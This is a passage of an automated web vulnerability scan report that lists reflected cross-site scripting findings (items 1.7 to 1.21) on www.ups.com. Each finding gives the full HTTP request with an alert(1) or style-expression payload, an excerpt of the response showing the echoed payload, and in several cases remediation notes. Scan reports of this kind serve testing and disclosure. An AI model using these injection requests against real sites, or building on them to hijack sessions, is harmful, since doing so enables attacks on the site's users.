The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4508"style%3d"x%3aexpression(alert(1))"db0ed3f5143 was submitted in the loc parameter. This input was echoed as c4508"style="x:expression(alert(1))"db0ed3f5143 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=en_USc4508"style%3d"x%3aexpression(alert(1))"db0ed3f5143&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=DWTzNYGQHR1jTpLtNvBGDZLcL5q5CvJp349WjJvcM9Y1g2VCjvJ0!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18024


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
   value="&WT.svl=PriNav&loc=en_USc4508"style="x:expression(alert(1))"db0ed3f5143" />
...[SNIP]...

1.7. http://www.ups.com/bussol [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 447f7"%3balert(1)//99f06ff3db6 was submitted in the loc parameter. This input was echoed as 447f7";alert(1)//99f06ff3db6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bussol?loc=en_US447f7"%3balert(1)//99f06ff3db6&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:37 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=2PvYNYGRRBhwJYyp24HblqFn9bTTQTC64XDGXYWs2YQyywJx17pG!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17948


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
eDomain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "bspa_xmlRoot=/xml/ria/na/us/en/bussol/&hash=1297646737274&loc=en_US447f7";alert(1)//99f06ff3db6&v=2.0.4"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.8. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50f65"><script>alert(1)</script>5b1105e1d12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol?50f65"><script>alert(1)</script>5b1105e1d12=1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=p12cNYGQVCmgTrnxV82pBjBNpyBnQNMFsg2WXBQNQ5kNp7dN0vmk!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17904


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
   value="&50f65"><script>alert(1)</script>5b1105e1d12=1" />
...[SNIP]...

1.9. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4488"%3balert(1)//40eab8ba899 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4488";alert(1)//40eab8ba899 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bussol?f4488"%3balert(1)//40eab8ba899=1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:38 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=hHRGNYGSG1qFq2p455VVvbKsh2Tl2HnHLFP4JjVGC8gGh3JzhfQS!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17874


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

           "allowScriptAccess","sameDomain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "bspa_xmlRoot=/xml/ria/na/us/en/bussol/&f4488";alert(1)//40eab8ba899=1&hash=1297646738736&loc=en_US&v=2.0.4"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.10. http://www.ups.com/bussol [viewID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the viewID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 146aa"%3balert(1)//bd3493845d2 was submitted in the viewID parameter. This input was echoed as 146aa";alert(1)//bd3493845d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bussol?loc=en_US&viewID=productView146aa"%3balert(1)//bd3493845d2&contentID=ct1_sol_sol_int_ship&actionID=videoDemo HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:43 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=rzNnNYGXg4SD00mpLyKTNYqkqnGB6nQpPPbbP0rsHMWZNB4nGR5N!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18084


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
tp://www.adobe.com/go/getflashplayer",
           "FlashVars", "actionID=videoDemo&bspa_xmlRoot=/xml/ria/na/us/en/bussol/&contentID=ct1_sol_sol_int_ship&hash=1297646743669&loc=en_US&v=2.0.4&viewID=productView146aa";alert(1)//bd3493845d2"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.11. http://www.ups.com/bussol [viewID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the viewID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84d0b"style%3d"x%3aexpression(alert(1))"f75fdcc79ee was submitted in the viewID parameter. This input was echoed as 84d0b"style="x:expression(alert(1))"f75fdcc79ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=en_US&viewID=productView84d0b"style%3d"x%3aexpression(alert(1))"f75fdcc79ee&contentID=ct1_sol_sol_int_ship&actionID=videoDemo HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:41 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=kfpyNYGVyJYcd5nzxs2wgPQkWb7XT8vVtlpnGtZn3Y1yHCd2cJCC!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18141


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="bspa_viewID"
   value="productView84d0b"style="x:expression(alert(1))"f75fdcc79ee" />
...[SNIP]...

1.12. http://www.ups.com/bussol/ [WT.svl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The value of the WT.svl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38a59"style%3d"x%3aexpression(alert(1))"6e9610dfaef was submitted in the WT.svl parameter. This input was echoed as 38a59"style="x:expression(alert(1))"6e9610dfaef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol/?loc=en_US&viewID=browseView&WT.svl=PriNav38a59"style%3d"x%3aexpression(alert(1))"6e9610dfaef&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:42 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=hg8jNYGW0m7dsy3WYSgLQ7QfjtzHmgCvtyjGk22JY61HnP3QQr8J!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17929


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
   value="&viewID=browseView&WT.svl=PriNav38a59"style="x:expression(alert(1))"6e9610dfaef&loc=en_US" />
...[SNIP]...

1.13. http://www.ups.com/bussol/ [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ba38"%3balert(1)//d52a61ceed4 was submitted in the loc parameter. This input was echoed as 3ba38";alert(1)//d52a61ceed4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bussol/?loc=en_US3ba38"%3balert(1)//d52a61ceed4&viewID=browseView&WT.svl=PriNav&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=HBsWNYGQkl1y5dT46xdvnXNbdJG3FS5Y0hxDRT3g58MGvMpT1v2k!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17994


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
eDomain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "bspa_xmlRoot=/xml/ria/na/us/en/bussol/&hash=1297646736921&loc=en_US3ba38";alert(1)//d52a61ceed4&v=2.0.4&viewID=browseView"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.14. http://www.ups.com/bussol/ [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2cb0"style%3d"x%3aexpression(alert(1))"1a12ccdf313 was submitted in the loc parameter. This input was echoed as e2cb0"style="x:expression(alert(1))"1a12ccdf313 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol/?loc=en_USe2cb0"style%3d"x%3aexpression(alert(1))"1a12ccdf313&viewID=browseView&WT.svl=PriNav&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=McY2NYGQB3Plb5QJJ76xlt1TsfghpCJGBL82fYy9TZl3kByrnsDK!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18070


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
   value="&viewID=browseView&WT.svl=PriNav&loc=en_USe2cb0"style="x:expression(alert(1))"1a12ccdf313" />
...[SNIP]...

1.15. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 582f9"%3balert(1)//3f6cf9199d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 582f9";alert(1)//3f6cf9199d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bussol/?582f9"%3balert(1)//3f6cf9199d5=1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=Z2rlNYGQLcQDlzCSYkFCcdRy0gzf5r1LDs5gDDnbhBQvdfjtc5ln!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17874


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
lor", "#869ca7",
           "name", "bussol",
           "allowScriptAccess","sameDomain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "582f9";alert(1)//3f6cf9199d5=1&bspa_xmlRoot=/xml/ria/na/us/en/bussol/&hash=1297646736688&loc=en_US&v=2.0.4"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display =
...[SNIP]...

1.16. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f277"><script>alert(1)</script>5f1197d854b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol/?7f277"><script>alert(1)</script>5f1197d854b=1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=LnCdNYGQnMQlkndzq12lTrZf1YJXy8q8Q4zYPKzFPPYvjywjk1vm!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17904


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
   value="&7f277"><script>alert(1)</script>5f1197d854b=1" />
...[SNIP]...

1.17. http://www.ups.com/bussol/ [viewID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The value of the viewID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47fa2"%3balert(1)//ebe16f7eeec was submitted in the viewID parameter. This input was echoed as 47fa2";alert(1)//ebe16f7eeec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bussol/?loc=en_US&viewID=browseView47fa2"%3balert(1)//ebe16f7eeec&WT.svl=PriNav&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:40 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=1skDNYGJnpQbW35Gyd5CQzr6JgDLTXLRbrDhGxGFhfhp4Y6QTVbS!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17966


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
lication/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "bspa_xmlRoot=/xml/ria/na/us/en/bussol/&hash=1297646740543&loc=en_US&v=2.0.4&viewID=browseView47fa2";alert(1)//ebe16f7eeec"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.18. http://www.ups.com/bussol/ [viewID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The value of the viewID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 948b5"style%3d"x%3aexpression(alert(1))"6ccbe3a297a was submitted in the viewID parameter. This input was echoed as 948b5"style="x:expression(alert(1))"6ccbe3a297a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol/?loc=en_US&viewID=browseView948b5"style%3d"x%3aexpression(alert(1))"6ccbe3a297a&WT.svl=PriNav&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:39 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=hWWhNYGTZF7r1mv0H5V2nHjKH8JjGycJTT32p2qb4NFT6r3f5BpS!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18023


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="bspa_viewID"
   value="browseView948b5"style="x:expression(alert(1))"6ccbe3a297a" />
...[SNIP]...

1.19. http://www.ups.com/content/global/index.jsx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/global/index.jsx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be80f"style%3d"x%3aexpression(alert(1))"dcbd75eabc1 was submitted in the REST URL parameter 2. This input was echoed as be80f"style="x:expression(alert(1))"dcbd75eabc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/globalbe80f"style%3d"x%3aexpression(alert(1))"dcbd75eabc1/index.jsx HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 124321


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/globalbe80f"style="x:expression(alert(1))"dcbd75eabc1/index.jsx">
...[SNIP]...

1.20. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a487"style%3d"x%3aexpression(alert(1))"0e616329edb was submitted in the REST URL parameter 2. This input was echoed as 3a487"style="x:expression(alert(1))"0e616329edb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us3a487"style%3d"x%3aexpression(alert(1))"0e616329edb/en/about/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46477


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us3a487"style="x:expression(alert(1))"0e616329edb/en/about/index.html">
...[SNIP]...

1.21. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74567"style%3d"x%3aexpression(alert(1))"c1726c9caa7 was submitted in the REST URL parameter 3. This input was echoed as 74567"style="x:expression(alert(1))"c1726c9caa7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

